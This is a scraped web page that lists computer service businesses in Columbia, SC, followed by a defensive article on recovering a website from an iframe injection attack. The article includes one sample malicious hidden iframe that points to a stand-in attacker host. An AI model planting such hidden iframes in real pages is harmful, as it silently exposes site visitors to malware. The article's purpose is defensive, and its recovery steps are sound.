IFrame Injection Attack: Cross Site Scripting (XSS) Tutorials Columbia SC
IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.
International Computer Services
(803) 750-7185
736 St. Andrews Rd.Ste. 152
Columbia, SC
(803) 750-7185
736 St. Andrews Rd.Ste. 152
Columbia, SC 29210
Services
Information Technology Services, Internet Products and Services, Computer Consultants
Hours
Mon-Sat: 08:00 AM-09:00 PM
Data Provided by:
Cisco Systems
(803) 790-2900
4875 Forest Drive # 206
Columbia, SC
(803) 790-2900
4875 Forest Drive # 206
Columbia, SC 29206
Services
Computer and Equipment Dealers, Personal Computer Peripheral Equipment, Computer Networks, Data Communications Equipment and Systems
Data Provided by:
Hardware Gallery
(803) 647-7855
94 N Shorecrest Road
Columbia, SC
Hardware Gallery
(803) 647-7855
94 N Shorecrest Road
Columbia, SC 29209
Services
Computer Systems Consultants and Designers, Scientific and Technical Consultants, Hardware Dealers
Data Provided by:
Geek Squad
(866) 338-0243
7006 TWO NOTCH ROAD
COLUMBIA, SC
Geek Squad
(866) 338-0243
7006 TWO NOTCH ROAD
COLUMBIA, SC 29223
Data Provided by:
Geek Squad
(866) 338-0243
5135 Sunset Blvd
Lexington, SC
Geek Squad
(866) 338-0243
5135 Sunset Blvd
Lexington, SC 29072
Data Provided by:
Zencala's Computers
(803) 673-2075
201 Woodland Village Drive
Columbia, SC
(803) 673-2075
201 Woodland Village Drive
Columbia, SC 29210
Services
Computers and Equipment Repair and Maintenance, Computer and Equipment Dealers, Computers and Equipment Wholesale and Manufacturers, Computers and Equipment Installation
Hours
Mon-Sun: 12:00 AM-12:00 AM
Data Provided by:
COMPUTER CARE
(803) 210-6901
1215 G AUGUSTA RD
West Columbia, SC
(803) 210-6901
1215 G AUGUSTA RD
West Columbia, SC 29169
Services
Computers and Equipment Repair and Maintenance, Computer and Equipment Dealers, Computers and Equipment Installation, Computer Cable and Wire Installation, Computer Networks
Hours
Mon 09:00 AM-08:00 PM
Tue 09:00 AM-08:00 PM
Wed 09:00 AM-08:00 PM,
Data Provided by:
Palmetto Hosting
(803) 951-3630
129 Secret Cove Drive
Lexington, SC
(803) 951-3630
129 Secret Cove Drive
Lexington, SC 29072
Services
Computer Networks
Data Provided by:
Geek Squad
(800) 489-0623
370 HARBISON BLVDt
COLUMBIABeach, SC
Geek Squad
(800) 489-0623
370 HARBISON BLVDt
COLUMBIABeach, SC 29212
Data Provided by:
MacLife Support
(843) 224-5888
18 E. Elliot
Charleston, SC
(843) 224-5888
18 E. Elliot
Charleston, SC 29401
Services
Computer Consultants, Computers and Equipment Installation, Computers and Equipment Rental and Leasing, Personal Computer Peripheral Equipment, Computer Software
Payment Options
Personal Checks, Credit Terms Available, Financing Available
Data Provided by:
Data Provided by:
Provided By: 
| IFrame Injection Attack is most common and most basic cross site scripting (XSS) attacks | Written by Vijay Patil
IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
An example of a malicious IFRAME injection code
1. Take your website down for a certain periodIt is recommended to take the website down as you do not want to be distributing malware or virus from your website to your visitors. The website should be offline while you are recovering the site.
2. Change all the passwordsAlthough this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website; which include ftp passwords, ssh passwords, account passwords, database passwords, admin passwords and so on.
3. Take a copy of the affected website for further analysisYou may want to do a further analysis on the attack and might need to refer to the exact injection source code in the future. Take a copy of the affected website in a compressed format, eg: zip or gzip and store it in an quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.
4. Replace the entire site with a clean backup copyDo not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night, however, it is more reliable if you have other backup solutions for your website.
5. Test the website and reopenThis is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.
6. Analyse how the attack was originatedIn order to ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it was originated. Was it because of a security hole in your application? Was it caused by a weak file permission? Or is your server affected with some virus that injects these code into your website at regular interval? You will need to understand how it happens in order to prevent it in the future. And when necessary, obtain an expert advice.
7. Perform appropriate security measures based on the analysisAlthough you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is probably very likely that the website will be attac... | |
